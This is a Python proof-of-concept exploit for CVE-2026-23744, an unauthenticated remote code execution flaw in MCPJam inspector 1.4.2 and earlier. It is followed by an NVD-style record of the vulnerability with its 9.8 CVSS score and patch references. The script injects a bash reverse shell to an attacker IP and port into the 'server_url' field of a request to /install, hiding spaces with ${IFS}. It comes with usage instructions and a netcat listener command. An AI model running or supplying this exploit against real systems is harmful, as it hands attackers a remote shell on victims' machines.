CVE-2026-23744

import requests import sys # CVE-2026-23744 PoC - MCPJam inspector RCE # Target: MCPJam inspector <= 1.4.2 def exploit(target_url, attacker_ip, attacker_port): """ Exploit CVE-2026-23744 by sending a crafted HTTP request that triggers MCP server installation with RCE payload """ # Reverse shell payload payload = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1" encoded_payload = payload.replace(" ", "${IFS}") # PoC: Trigger MCP server installation with malicious command exploit_url = f"{target_url}/install" headers = { 'Content-Type': 'application/json', 'User-Agent': 'MCPJam-Installer/1.4.2' } # Crafted request that exploits the RCE during MCP server installation data = { 'server_url': f"http://malicious.com/server && {encoded_payload}", 'auto_install': True, 'force': True } print(f"[*] Sending exploit payload to {exploit_url}") print(f"[*] Payload: {payload}") try: response = requests.post(exploit_url, json=data, headers=headers, timeout=10) print(f"[+] Request sent, status code: {response.status_code}") print(f"[*] Response: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <attacker_ip> <attacker_port>") print(f"Example: python {sys.argv[0]} http://target.com:8080 192.168.1.100 4444") sys.exit(1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] # Start listener in another terminal: nc -lvnp 4444 exploit(target, lhost, lport)

{"cve": {"id": "CVE-2026-23744", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:51.763", "lastModified": "2026-03-13T14:19:59.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch."}, {"lang": "es", "value": "MCPJam inspector es la plataforma de desarrollo local-first para servidores MCP. Las versiones 1.4.2 y anteriores tienen una vulnerabilidad de ejecución remota de código (RCE), que permite a un atacante enviar una solicitud HTTP manipulada que desencadena la instalación de un servidor MCP, lo que lleva a un RCE. Dado que MCPJam inspector por defecto escucha en 0.0.0.0 en lugar de 127.0.0.1, un atacante puede provocar la RCE de forma remota a través de una simple solicitud HTTP. La versión 1.4.3 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcpjam:inspector:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "5D462285-6F2E-445A-B169-77B9CC71AD45"}]}]}], "references": [{"url": "https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}